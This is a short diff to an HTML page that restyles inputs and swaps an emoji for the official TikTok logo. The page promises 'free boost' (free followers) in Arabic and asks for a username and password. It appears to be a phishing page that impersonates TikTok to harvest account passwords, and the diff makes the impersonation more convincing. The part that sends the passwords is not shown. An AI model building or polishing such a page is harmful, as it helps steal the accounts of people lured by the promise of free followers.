--- a/index.html
+++ b/index.html
@@ -28,7 +28,7 @@
     }
 
     .logo {
-      font-size: 60px;
+      width: 60px;
       margin-bottom: 15px;
     }
 
@@ -40,13 +40,14 @@
 
     input, select {
       width: 100%;
-      padding: 12px;
+      padding: 14px;
       margin: 10px 0;
       border: none;
       border-radius: 10px;
       background-color: #1e1e1e;
       color: white;
       font-size: 16px;
+      box-sizing: border-box;
     }
 
     button {
@@ -68,7 +69,7 @@
 </head>
 <body>
   <div class="container">
-    <div class="logo">🎵</div>
+    <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/6/69/TikTok_logo.svg" alt="TikTok Logo">
     <h2>رشق مجاني</h2>
     <input type="text" id="username" placeholder="اسم المستخدم">
     <input type="password" id="password" placeholder="كلمة المرور">
